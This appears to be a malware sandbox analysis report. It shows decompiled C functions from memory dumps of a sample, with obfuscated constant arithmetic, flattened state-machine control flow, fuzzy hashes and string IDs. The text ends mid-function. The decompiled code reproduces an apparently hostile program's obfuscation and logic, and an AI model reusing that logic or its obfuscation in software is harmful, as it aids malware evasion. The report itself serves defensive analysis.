                                              							_t785 = E00221BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
                                              							_t706 = _v252;
                                              							E00232025(_t706, _t787, _v84, _v184);
                                              							_t795 = _t795 + 0x40;
                                              							__eflags = _t785;
                                              							if(_t785 == 0) {
                                              								_t786 = 0x2cd2473d;
                                              								L44:
                                              								_t707 = _v320;
                                              								_t758 = 0x1fbed331;
                                              								goto L45;
                                              							}
                                              							_push(_t706);
                                              							_v28 = 1;
                                              							_t693 = E00236AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
                                              							_t795 = _t795 + 0x18;
                                              							_v28 = _t693;
                                              							_t786 = 0xa0d70be;
                                              							goto L13;
                                              						}
                                              						__eflags = _t786 - 0x25fbc0d1;
                                              						if(_t786 == 0x25fbc0d1) {
                                              							_push(0x200);
                                              							_v24 = 0x200;
                                              							_t788 = E00228736(0x200);
                                              							_t712 = 0x200;
                                              							__eflags = _t788;
                                              							if(_t788 != 0) {
                                              								_t687 = E0022F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
                                              								_t795 = _t795 + 0x10;
                                              								__eflags = _t687;
                                              								if(_t687 == 0) {
                                              									_t689 = E00230F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
                                              									_t795 = _t795 + 0x14;
                                              									_v320 = _t689;
                                              								}
                                              								E0022F536(_v224, _v48, _v312, _t788);
                                              							}
                                              							_t786 = 0x276816a4;
                                              							goto L13;
                                              						}
                                              						__eflags = _t786 - 0x276816a4;
                                              						if(_t786 == 0x276816a4) {
                                              							_push(_t707);
                                              							_t672 = E00225A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
                                              							__eflags = _t672;
                                              							_v32 = _t672;
                                              							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
                                              							E0022F536(_v276, _v44, _v112, _v320);
                                              							_t795 = _t795 + 0x24;
                                              							goto L44;
                                              						}
                                              						__eflags = _t786 - 0x2cd2473d;
                                              						if(_t786 == 0x2cd2473d) {
                                              							E00227925(_v172, _t666, _v212, _v188);
                                              							_t786 = 0x1e7ff602;
                                              							goto L12;
                                              						}
                                              						__eflags = _t786 - 0x33e5fd12;
                                              						if(__eflags != 0) {
                                              							goto L45;
                                              						}
                                              						__eflags = E0023687F(_t785, _v156, __eflags) - _v52;
                                              						_t758 = 0x1fbed331;
                                              						_t666 = _v316;
                                              						_t707 = _v320;
                                              						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
                                              					}
                                              				}
                                              			}


                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
                                              • API String ID: 0-3595463394
                                              • Opcode ID: e94679bf9348efdbdc226952b709604b865745a13453338fa8c2dde984944914
                                              • Instruction ID: e639dbbf195966caf37042e01c59241edc7458d80d03cc0a05b19e41440a97a2
                                              • Opcode Fuzzy Hash: e94679bf9348efdbdc226952b709604b865745a13453338fa8c2dde984944914
                                              • Instruction Fuzzy Hash: 5E721F71508381DBE3B8CF65D54AB9BBBE1BBC4304F108A1DE5D9862A0DBB58859CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E0022D7EB() {
                                              				char _v520;
                                              				char _v1040;
                                              				signed int _v1044;
                                              				signed int _v1048;
                                              				signed int _v1052;
                                              				signed int _v1056;
                                              				signed int _v1060;
                                              				signed int _v1064;
                                              				signed int _v1068;
                                              				signed int _v1072;
                                              				signed int _v1076;
                                              				signed int _v1080;
                                              				signed int _v1084;
                                              				signed int _v1088;
                                              				signed int _v1092;
                                              				signed int _v1096;
                                              				signed int _v1100;
                                              				signed int _v1104;
                                              				signed int _v1108;
                                              				signed int _v1112;
                                              				signed int _v1116;
                                              				signed int _v1120;
                                              				signed int _v1124;
                                              				signed int _v1128;
                                              				signed int _v1132;
                                              				signed int _v1136;
                                              				signed int _v1140;
                                              				signed int _v1144;
                                              				signed int _v1148;
                                              				signed int _v1152;
                                              				signed int _v1156;
                                              				signed int _v1160;
                                              				signed int _v1164;
                                              				signed int _v1168;
                                              				signed int _v1172;
                                              				signed int _v1176;
                                              				signed int _v1180;
                                              				signed int _v1184;
                                              				signed int _v1188;
                                              				signed int _v1192;
                                              				signed int _v1196;
                                              				signed int _v1200;
                                              				signed int _v1204;
                                              				signed int _v1208;
                                              				signed int _v1212;
                                              				void* _t365;
                                              				intOrPtr _t367;
                                              				signed int _t379;
                                              				void* _t380;
                                              				void* _t399;
                                              				intOrPtr _t402;
                                              				signed int _t408;
                                              				intOrPtr _t409;
                                              				intOrPtr* _t410;
                                              				signed int _t411;
                                              				signed int _t412;
                                              				signed int _t413;
                                              				signed int _t414;
                                              				signed int _t416;
                                              				signed int* _t417;
                                              				void* _t419;
                                              
                                              				_t417 =  &_v1212;
                                              				_v1164 = 0xe848;
                                              				_v1164 = _v1164 << 0xc;
                                              				_t380 = 0xeb1d0fe;
                                              				_v1164 = _v1164 << 2;
                                              				_v1164 = _v1164 ^ 0x3a120029;
                                              				_v1196 = 0xb50a;
                                              				_v1196 = _v1196 * 0x54;
                                              				_v1196 = _v1196 << 1;
                                              				_v1196 = _v1196 << 0xc;
                                              				_v1196 = _v1196 ^ 0x6ce97179;
                                              				_v1072 = 0xa1a9;
                                              				_v1072 = _v1072 >> 6;
                                              				_v1072 = _v1072 ^ 0x00006740;
                                              				_v1112 = 0x5ab8;
                                              				_v1112 = _v1112 | 0xd40f1486;
                                              				_v1112 = _v1112 ^ 0xd40f3c8d;
                                              				_v1168 = 0x99b2;
                                              				_v1168 = _v1168 ^ 0x8e209920;
                                              				_v1168 = _v1168 + 0x17b0;
                                              				_v1168 = _v1168 + 0xffff252c;
                                              				_v1168 = _v1168 ^ 0x8e1f3ab7;
                                              				_v1108 = 0x6700;
                                              				_v1108 = _v1108 ^ 0xd74b138d;
                                              				_v1108 = _v1108 ^ 0xd74b4d2a;
                                              				_v1116 = 0xa6d3;
                                              				_v1116 = _v1116 << 0xc;
                                              				_v1116 = _v1116 ^ 0x0a6d47ef;
                                              				_v1144 = 0x46d4;
                                              				_v1144 = _v1144 | 0x60392883;
                                              				_t411 = 0x3e;
                                              				_v1052 = _v1052 & 0x00000000;
                                              				_v1144 = _v1144 / _t411;
                                              				_v1144 = _v1144 ^ 0x018d3ef5;
                                              				_v1212 = 0x195d;
                                              				_v1212 = _v1212 + 0x9a8f;
                                              				_v1212 = _v1212 >> 2;
                                              				_v1212 = _v1212 >> 0xf;
                                              				_v1212 = _v1212 ^ 0x00005610;
                                              				_v1092 = 0x8c48;
                                              				_v1092 = _v1092 | 0x14bcb660;
                                              				_v1092 = _v1092 ^ 0x14bcd719;
                                              				_v1184 = 0xdf30;
                                              				_v1184 = _v1184 | 0x71150163;
                                              				_v1184 = _v1184 + 0xffff3ca6;
                                              				_v1184 = _v1184 >> 5;
                                              				_v1184 = _v1184 ^ 0x03888299;
                                              				_v1100 = 0xf0a2;
                                              				_v1100 = _v1100 >> 2;
                                              				_v1100 = _v1100 ^ 0x00007018;
                                              				_v1076 = 0xde4e;
                                              				_v1076 = _v1076 * 0x25;
                                              				_v1076 = _v1076 ^ 0x0020254d;
                                              				_v1084 = 0x8f7c;
                                              				_v1084 = _v1084 + 0x3023;
                                              				_v1084 = _v1084 ^ 0x00008967;
                                              				_v1136 = 0x4c3;
                                              				_v1136 = _v1136 + 0xbbe6;
                                              				_v1136 = _v1136 | 0x03b94668;
                                              				_v1136 = _v1136 ^ 0x03b9f10c;
                                              				_v1120 = 0xdab0;
                                              				_v1120 = _v1120 << 2;
                                              				_v1120 = _v1120 ^ 0x0003158f;
                                              				_v1080 = 0xb6c1;
                                              				_v1080 = _v1080 ^ 0x2339c7b2;
                                              				_v1080 = _v1080 ^ 0x2339156d;
                                              				_v1152 = 0xaa63;
                                              				_v1152 = _v1152 | 0x7d17af71;
                                              				_v1152 = _v1152 << 0xc;
                                              				_v1152 = _v1152 ^ 0x7af75802;
                                              				_v1088 = 0x49a;
                                              				_v1088 = _v1088 >> 9;
                                              				_v1088 = _v1088 ^ 0x00004f36;
                                              				_v1192 = 0x2678;
                                              				_v1192 = _v1192 + 0xb679;
                                              				_v1192 = _v1192 << 0x10;
                                              				_v1192 = _v1192 + 0xffff3370;
                                              				_v1192 = _v1192 ^ 0xdcf068a3;
                                              				_v1064 = 0xeafb;
                                              				_v1064 = _v1064 << 1;
                                              				_v1064 = _v1064 ^ 0x00019538;
                                              				_v1096 = 0x88f8;
                                              				_t412 = 0x34;
                                              				_v1096 = _v1096 * 0x4f;
                                              				_v1096 = _v1096 ^ 0x002a1ade;
                                              				_v1132 = 0xf8dd;
                                              				_v1132 = _v1132 << 0xb;
                                              				_v1132 = _v1132 * 6;
                                              				_v1132 = _v1132 ^ 0x2ea92e25;
                                              				_v1148 = 0xb66c;
                                              				_v1148 = _v1148 * 0x79;
                                              				_v1148 = _v1148 * 0x37;
                                              				_v1148 = _v1148 ^ 0x12863225;
                                              				_v1044 = 0x2ced;
                                              				_v1044 = _v1044 | 0x6c1d274b;
                                              				_v1044 = _v1044 ^ 0x6c1d554c;
                                              				_v1104 = 0xd4fb;
                                              				_v1104 = _v1104 + 0xc222;
                                              				_v1104 = _v1104 ^ 0x0001c0a4;
                                              				_v1140 = 0xeff1;
                                              				_v1140 = _v1140 | 0x2c578e17;
                                              				_v1140 = _v1140 ^ 0x1f5808a8;
                                              				_v1140 = _v1140 ^ 0x330f90e2;
                                              				_v1156 = 0x54a4;
                                              				_v1156 = _v1156 ^ 0xe69aec3e;
                                              				_v1156 = _v1156 ^ 0x7a062859;
                                              				_v1156 = _v1156 ^ 0x9c9c8f10;
                                              				_v1180 = 0xa2be;
                                              				_v1180 = _v1180 / _t412;
                                              				_v1180 = _v1180 << 0xb;
                                              				_v1180 = _v1180 << 6;
                                              				_v1180 = _v1180 ^ 0x0642737d;
                                              				_v1204 = 0x65ae;
                                              				_v1204 = _v1204 + 0xb2b7;
                                              				_v1204 = _v1204 + 0xbb73;
                                              				_v1204 = _v1204 << 6;
                                              				_v1204 = _v1204 ^ 0x0074b164;
                                              				_v1176 = 0x3ecd;
                                              				_v1176 = _v1176 | 0x1d534930;
                                              				_v1176 = _v1176 << 0xa;
                                              				_v1176 = _v1176 ^ 0x842f9ee3;
                                              				_v1176 = _v1176 ^ 0xc9d04901;
                                              				_v1056 = 0xf360;
                                              				_v1056 = _v1056 | 0x93122b66;
                                              				_v1056 = _v1056 ^ 0x9312fd26;
                                              				_v1124 = 0x4a26;
                                              				_v1124 = _v1124 | 0x286a3d77;
                                              				_v1124 = _v1124 ^ 0x286a2522;
                                              				_v1060 = 0x57ed;
                                              				_v1060 = _v1060 + 0x784b;
                                              				_v1060 = _v1060 ^ 0x0000c3a5;
                                              				_v1068 = 0x69c7;
                                              				_v1068 = _v1068 << 5;
                                              				_v1068 = _v1068 ^ 0x000d6de9;
                                              				_v1208 = 0xffbd;
                                              				_v1208 = _v1208 * 0x3d;
                                              				_v1208 = _v1208 << 5;
                                              				_v1208 = _v1208 + 0x87f5;
                                              				_v1208 = _v1208 ^ 0x079ed184;
                                              				_v1128 = 0x5d27;
                                              				_v1128 = _v1128 >> 0xc;
                                              				_v1128 = _v1128 ^ 0x62edd6dc;
                                              				_v1128 = _v1128 ^ 0x62ed9c54;
                                              				_v1048 = 0x8776;
                                              				_t413 = 0x1e;
                                              				_t408 = _v1052;
                                              				_v1048 = _v1048 * 0xc;
                                              				_v1048 = _v1048 ^ 0x000959b7;
                                              				_v1172 = 0x35cb;
                                              				_t379 = _v1052;
                                              				_v1172 = _v1172 / _t413;
                                              				_v1172 = _v1172 | 0x92682d74;
                                              				_v1172 = _v1172 ^ 0x346a72ec;
                                              				_v1172 = _v1172 ^ 0xa6025f11;
                                              				_v1188 = 0x8f0f;
                                              				_t414 = 0x66;
                                              				_t416 = _v1052;
                                              				_v1188 = _v1188 / _t414;
                                              				_v1188 = _v1188 << 5;
                                              				_v1188 = _v1188 + 0x12e7;
                                              				_v1188 = _v1188 ^ 0x00003fc5;
                                              				_v1200 = 0x51b9;
                                              				_v1200 = _v1200 | 0x17a7f9cb;
                                              				_v1200 = _v1200 << 8;
                                              				_v1200 = _v1200 | 0xe40f2208;
                                              				_v1200 = _v1200 ^ 0xe7fffb08;
                                              				_v1160 = 0x57cd;
                                              				_v1160 = _v1160 + 0xffffc371;
                                              				_v1160 = _v1160 ^ 0x54a04296;
                                              				_v1160 = _v1160 ^ 0x54a059b8;
                                              				while(1) {
                                              					L1:
                                              					_t399 = 0x5c;
                                              					do {
                                              						while(1) {
                                              							L2:
                                              							_t419 = _t380 - 0x21daabfe;
                                              							if(_t419 > 0) {
                                              								break;
                                              							}
                                              							if(_t419 == 0) {
                                              								_t409 =  *0x23ca2c; // 0x4d8300
                                              								_t410 = _t409 + 0x230;
                                              								while(1) {
                                              									__eflags =  *_t410 - _t399;
                                              									if( *_t410 == _t399) {
                                              										break;
                                              									}
                                              									_t410 = _t410 + 2;
                                              									__eflags = _t410;
                                              								}
                                              								_t408 = _t410 + 2;
                                              								_t380 = 0x3af90ff3;
                                              								continue;
                                              							}
                                              							if(_t380 == 0x222340b) {
                                              								E00225FB2(_v1208, _v1128, _t379);
                                              								L27:
                                              								return _v1052;
                                              							}
                                              							if(_t380 == 0x88778bb) {
                                              								_t416 = E002254FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
                                              								_t417 =  &(_t417[0x16]);
                                              								__eflags = _t416;
                                              								if(_t416 == 0) {
                                              									_t380 = 0x222340b;
                                              								} else {
                                              									_t380 = 0x212fea65;
                                              									_v1052 = 1;
                                              								}
                                              								while(1) {
                                              									L1:
                                              									_t399 = 0x5c;
                                              									goto L2;
                                              								}
                                              							}
                                              							if(_t380 == 0xeb1d0fe) {
                                              								_push(_t380);
                                              								_push(_t380);
                                              								E0022C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
                                              								_t417 =  &(_t417[7]);
                                              								_t380 = 0x3304c1c2;
                                              								while(1) {
                                              									L1:
                                              									_t399 = 0x5c;
                                              									goto L2;
                                              								}
                                              							}
                                              							if(_t380 != 0x212fea65) {
                                              								goto L24;
                                              							}
                                              							E002342DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
                                              							_t417 =  &(_t417[4]);
                                              							_t380 = 0x2e0be9f8;
                                              							while(1) {
                                              								L1:
                                              								_t399 = 0x5c;
                                              								goto L2;
                                              							}
                                              						}
                                              						__eflags = _t380 - 0x2e0be9f8;
                                              						if(_t380 == 0x2e0be9f8) {
                                              							E00225FB2(_v1060, _v1068, _t416);
                                              							_t380 = 0x222340b;
                                              							_t399 = 0x5c;
                                              							goto L24;
                                              						}
                                              						__eflags = _t380 - 0x3304c1c2;
                                              						if(__eflags == 0) {
                                              							_push(_v1116);
                                              							_t365 = E0023889D(0x23c930, _v1108, __eflags);
                                              							_t367 =  *0x23ca2c; // 0x4d8300
                                              							_t402 =  *0x23ca2c; // 0x4d8300
                                              							E002229E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
                                              							E00232025(_v1076, _t365, _v1084, _v1136);
                                              							_t417 =  &(_t417[0xc]);
                                              							_t380 = 0x21daabfe;
                                              							while(1) {
                                              								L1:
                                              								_t399 = 0x5c;
                                              								goto L2;
                                              							}
                                              						}
                                              						__eflags = _t380 - 0x3af90ff3;
                                              						if(_t380 != 0x3af90ff3) {
                                              							goto L24;
                                              						}
                                              						_t379 = E00222959(_t380, _v1120, _v1080, _v1152, _v1048);
                                              						_t417 =  &(_t417[4]);
                                              						__eflags = _t379;
                                              						if(_t379 == 0) {
                                              							goto L27;
                                              						}
                                              						_t380 = 0x88778bb;
                                              						goto L1;
                                              						L24:
                                              						__eflags = _t380 - 0x27fd7905;
                                              					} while (_t380 != 0x27fd7905);
                                              					goto L27;
                                              				}
                                              			}

                                              0x0022dbd0
                                              0x0022dbd8
                                              0x0022dbe0
                                              0x0022dbeb
                                              0x0022dbf6
                                              0x0022dc01
                                              0x0022dc09
                                              0x0022dc11
                                              0x0022dc19
                                              0x0022dc24
                                              0x0022dc2f
                                              0x0022dc3a
                                              0x0022dc45
                                              0x0022dc4d
                                              0x0022dc58
                                              0x0022dc65
                                              0x0022dc69
                                              0x0022dc6e
                                              0x0022dc76
                                              0x0022dc7e
                                              0x0022dc86
                                              0x0022dc8b
                                              0x0022dc93
                                              0x0022dc9b
                                              0x0022dcb2
                                              0x0022dcb5
                                              0x0022dcbc
                                              0x0022dcc3
                                              0x0022dcce
                                              0x0022dcde
                                              0x0022dce5
                                              0x0022dce9
                                              0x0022dcf1
                                              0x0022dcf9
                                              0x0022dd01
                                              0x0022dd0d
                                              0x0022dd10
                                              0x0022dd17
                                              0x0022dd1b
                                              0x0022dd20
                                              0x0022dd28
                                              0x0022dd30
                                              0x0022dd38
                                              0x0022dd40
                                              0x0022dd45
                                              0x0022dd4d
                                              0x0022dd55
                                              0x0022dd5d
                                              0x0022dd65
                                              0x0022dd6d
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x0022dd78
                                              0x0022dd78
                                              0x0022dd78
                                              0x0022dd78
                                              0x0022dd7e
                                              0x00000000
                                              0x00000000
                                              0x0022dd84
                                              0x0022de9f
                                              0x0022dea5
                                              0x0022deb0
                                              0x0022deb0
                                              0x0022deb3
                                              0x00000000
                                              0x00000000
                                              0x0022dead
                                              0x0022dead
                                              0x0022dead
                                              0x0022deb5
                                              0x0022deb8
                                              0x00000000
                                              0x0022deb8
                                              0x0022dd90
                                              0x0022dfca
                                              0x0022dfd0
                                              0x0022dfe1
                                              0x0022dfe1
                                              0x0022dd9c
                                              0x0022de77
                                              0x0022de79
                                              0x0022de7c
                                              0x0022de7e
                                              0x0022de95
                                              0x0022de80
                                              0x0022de80
                                              0x0022de85
                                              0x0022de85
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022dda4
                                              0x0022ddd7
                                              0x0022ddd8
                                              0x0022ddfc
                                              0x0022de01
                                              0x0022de04
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022ddac
                                              0x00000000
                                              0x00000000
                                              0x0022ddc8
                                              0x0022ddcd
                                              0x0022ddd0
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022dec2
                                              0x0022dec8
                                              0x0022dfa5
                                              0x0022dfad
                                              0x0022dfb2
                                              0x00000000
                                              0x0022dfb2
                                              0x0022dece
                                              0x0022ded4
                                              0x0022df14
                                              0x0022df21
                                              0x0022df42
                                              0x0022df5c
                                              0x0022df68
                                              0x0022df84
                                              0x0022df89
                                              0x0022df8c
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022ded6
                                              0x0022dedc
                                              0x00000000
                                              0x00000000
                                              0x0022defd
                                              0x0022deff
                                              0x0022df02
                                              0x0022df04
                                              0x00000000
                                              0x00000000
                                              0x0022df0a
                                              0x00000000
                                              0x0022dfb3
                                              0x0022dfb3
                                              0x0022dfb3
                                              0x00000000
                                              0x0022dfbf

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
                                              • API String ID: 0-131801274
                                              • Opcode ID: adf89437309e037693898407d27ab34d8dc682606898ddaefb12b431068c15b2
                                              • Instruction ID: 82db693e768b045727ca0fe062d070702c690e677d80d3c6408c9c4cdcfe221b
                                              • Opcode Fuzzy Hash: adf89437309e037693898407d27ab34d8dc682606898ddaefb12b431068c15b2
                                              • Instruction Fuzzy Hash: F3021271118381EFE369CF61D54AA5BBBE1FBC5708F10891DE2DA862A0C7B58958CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E0022F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				char _v1;
                                              				char _v96;
                                              				char _v108;
                                              				char _v112;
                                              				char _v116;
                                              				intOrPtr _v120;
                                              				char _v124;
                                              				char _v128;
                                              				signed int _v132;
                                              				signed int _v136;
                                              				signed int _v140;
                                              				signed int _v144;
                                              				signed int _v148;
                                              				signed int _v152;
                                              				signed int _v156;
                                              				signed int _v160;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				signed int _v172;
                                              				signed int _v176;
                                              				signed int _v180;
                                              				signed int _v184;
                                              				signed int _v188;
                                              				signed int _v192;
                                              				signed int _v196;
                                              				signed int _v200;
                                              				signed int _v204;
                                              				signed int _v208;
                                              				signed int _v212;
                                              				unsigned int _v216;
                                              				signed int _v220;
                                              				signed int _v224;
                                              				signed int _v228;
                                              				signed int _v232;
                                              				intOrPtr _v236;
                                              				signed int _v240;
                                              				signed int _v244;
                                              				signed int _v248;
                                              				signed int _v252;
                                              				signed int _v256;
                                              				signed int _v260;
                                              				signed int _v264;
                                              				intOrPtr _v268;
                                              				void* __ecx;
                                              				void* _t344;
                                              				void* _t374;
                                              				signed int _t377;
                                              				intOrPtr _t391;
                                              				void* _t392;
                                              				intOrPtr _t393;
                                              				signed int _t395;
                                              				intOrPtr _t396;
                                              				signed int _t397;
                                              				intOrPtr* _t401;
                                              				intOrPtr _t403;
                                              				intOrPtr* _t416;
                                              				char* _t448;
                                              				signed int _t450;
                                              				signed int _t451;
                                              				signed int _t452;
                                              				signed int _t453;
                                              				signed int _t454;
                                              				signed int _t455;
                                              				signed int _t456;
                                              				signed int _t457;
                                              				signed int _t458;
                                              				signed int _t459;
                                              				char* _t460;
                                              				void* _t461;
                                              				intOrPtr* _t468;
                                              				void* _t470;
                                              				void* _t472;
                                              
                                              				_t401 = _a4;
                                              				_push(_a16);
                                              				_t468 = __edx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_t401);
                                              				_push(__edx);
                                              				E0022602B(_t344);
                                              				_v180 = 0x2a54;
                                              				_t470 =  &_v268 + 0x18;
                                              				_v180 = _v180 ^ 0xdbb28899;
                                              				_t403 = 0;
                                              				_t461 = 0x405be48;
                                              				_v268 = 0;
                                              				_t450 = 0x55;
                                              				_v180 = _v180 * 0x34;
                                              				_v180 = _v180 ^ 0xa04911e4;
                                              				_v164 = 0x788;
                                              				_v164 = _v164 * 0x79;
                                              				_v164 = _v164 ^ 0x00038f4a;
                                              				_v260 = 0xdd03;
                                              				_v260 = _v260 ^ 0x82285f25;
                                              				_v260 = _v260 >> 7;
                                              				_v260 = _v260 << 4;
                                              				_v260 = _v260 ^ 0x104552fc;
                                              				_v132 = 0x81fa;
                                              				_v132 = _v132 | 0x4b6553e1;
                                              				_v132 = _v132 ^ 0x4b658f00;
                                              				_v208 = 0xbd69;
                                              				_t451 = 0x73;
                                              				_v208 = _v208 / _t450;
                                              				_v208 = _v208 + 0x56ba;
                                              				_v208 = _v208 ^ 0x000029ec;
                                              				_v156 = 0x625a;
                                              				_v156 = _v156 + 0xffff65b2;
                                              				_v156 = _v156 ^ 0xffffa807;
                                              				_v176 = 0xc378;
                                              				_v176 = _v176 >> 1;
                                              				_v176 = _v176 + 0x1919;
                                              				_v176 = _v176 ^ 0x00004408;
                                              				_v228 = 0xbfad;
                                              				_v228 = _v228 + 0xffff004b;
                                              				_v228 = _v228 / _t451;
                                              				_t452 = 0x16;
                                              				_v228 = _v228 / _t452;
                                              				_v228 = _v228 ^ 0x0019c242;
                                              				_v264 = 0x218a;
                                              				_v264 = _v264 | 0xaefe0d97;
                                              				_v264 = _v264 + 0x77f0;
                                              				_v264 = _v264 + 0xffffbecb;
                                              				_v264 = _v264 ^ 0xaefe1c0e;
                                              				_v152 = 0x1773;
                                              				_v152 = _v152 + 0x7c73;
                                              				_v152 = _v152 ^ 0x000090c4;
                                              				_v140 = 0xfcb3;
                                              				_v140 = _v140 + 0xffff1dd8;
                                              				_v140 = _v140 ^ 0x00004a86;
                                              				_v252 = 0x9e2f;
                                              				_t453 = 9;
                                              				_v252 = _v252 / _t453;
                                              				_v252 = _v252 << 0xc;
                                              				_v252 = _v252 + 0x6e7b;
                                              				_v252 = _v252 ^ 0x01198ad6;
                                              				_v136 = 0x978d;
                                              				_v136 = _v136 << 0xb;
                                              				_v136 = _v136 ^ 0x04bc6438;
                                              				_v144 = 0xf0b5;
                                              				_t454 = 0x79;
                                              				_v144 = _v144 * 0x51;
                                              				_v144 = _v144 ^ 0x004c2c51;
                                              				_v224 = 0xa482;
                                              				_v224 = _v224 ^ 0xc585cea3;
                                              				_v224 = _v224 / _t454;
                                              				_v224 = _v224 ^ 0x01a18743;
                                              				_v148 = 0xd0a0;
                                              				_v148 = _v148 >> 1;
                                              				_v148 = _v148 ^ 0x000025e7;
                                              				_v232 = 0xead1;
                                              				_v232 = _v232 ^ 0xc3cfbc77;
                                              				_v232 = _v232 | 0xf3c428cf;
                                              				_v232 = _v232 + 0xffff938a;
                                              				_v232 = _v232 ^ 0xf3cf35e7;
                                              				_v160 = 0xb488;
                                              				_v160 = _v160 + 0xf6e2;
                                              				_v160 = _v160 ^ 0x0001c37e;
                                              				_v212 = 0xc903;
                                              				_t455 = 0x1e;
                                              				_v212 = _v212 / _t455;
                                              				_v212 = _v212 ^ 0xfd3886ab;
                                              				_v212 = _v212 ^ 0xfd38fa88;
                                              				_v196 = 0xdd05;
                                              				_v196 = _v196 << 5;
                                              				_v196 = _v196 + 0xdc4b;
                                              				_v196 = _v196 ^ 0x001c7bd6;
                                              				_v200 = 0x4db0;
                                              				_v200 = _v200 ^ 0x1a7afaec;
                                              				_v200 = _v200 >> 8;
                                              				_v200 = _v200 ^ 0x001a5e83;
                                              				_v240 = 0x9d3f;
                                              				_v240 = _v240 >> 8;
                                              				_v240 = _v240 << 9;
                                              				_v240 = _v240 + 0x917a;
                                              				_v240 = _v240 ^ 0x0001a611;
                                              				_v256 = 0x4a86;
                                              				_v256 = _v256 >> 0xd;
                                              				_t456 = 0x55;
                                              				_v256 = _v256 * 0x35;
                                              				_v256 = _v256 + 0xffffab30;
                                              				_v256 = _v256 ^ 0xffffb251;
                                              				_v204 = 0x386;
                                              				_v204 = _v204 / _t456;
                                              				_v204 = _v204 ^ 0xc8309f8e;
                                              				_v204 = _v204 ^ 0xc830cb09;
                                              				_v172 = 0x8769;
                                              				_v172 = _v172 >> 0xe;
                                              				_v172 = _v172 ^ 0x00003b2d;
                                              				_v244 = 0x2b5b;
                                              				_v244 = _v244 + 0xb0ca;
                                              				_v244 = _v244 + 0xd805;
                                              				_v244 = _v244 << 2;
                                              				_v244 = _v244 ^ 0x0006bd06;
                                              				_v184 = 0x1527;
                                              				_v184 = _v184 | 0xeeea078d;
                                              				_t457 = 0x28;
                                              				_v184 = _v184 / _t457;
                                              				_v184 = _v184 ^ 0x05f92fca;
                                              				_v192 = 0x11fc;
                                              				_t458 = 0x16;
                                              				_v192 = _v192 / _t458;
                                              				_v192 = _v192 ^ 0x8895e54e;
                                              				_v192 = _v192 ^ 0x8895ebcd;
                                              				_v168 = 0xe011;
                                              				_v168 = _v168 + 0x4c50;
                                              				_v168 = _v168 ^ 0x0001058b;
                                              				_v216 = 0xf07;
                                              				_t459 = 0x32;
                                              				_v216 = _v216 * 0x36;
                                              				_v216 = _v216 >> 2;
                                              				_v216 = _v216 ^ 0x00008949;
                                              				_v248 = 0xde23;
                                              				_v248 = _v248 + 0xecd9;
                                              				_v248 = _v248 << 0xd;
                                              				_v248 = _v248 ^ 0x1d8b17f5;
                                              				_v248 = _v248 ^ 0x24d4a8d4;
                                              				_v220 = 0x3854;
                                              				_v220 = _v220 | 0x09b0f0f7;
                                              				_v220 = _v220 + 0xe63e;
                                              				_v220 = _v220 ^ 0x09b1b8f3;
                                              				_v188 = 0x295e;
                                              				_v188 = _v188 * 0x23;
                                              				_v188 = _v188 / _t459;
                                              				_v188 = _v188 ^ 0x00001cf4;
                                              				_t460 = _v124;
                                              				while(1) {
                                              					L1:
                                              					_t441 = _v236;
                                              					while(1) {
                                              						L2:
                                              						_t472 = _t461 - 0x299f8b6c;
                                              						if(_t472 <= 0) {
                                              							break;
                                              						}
                                              						if(_t461 == 0x2e2d51e6) {
                                              							_v124 = 0x14;
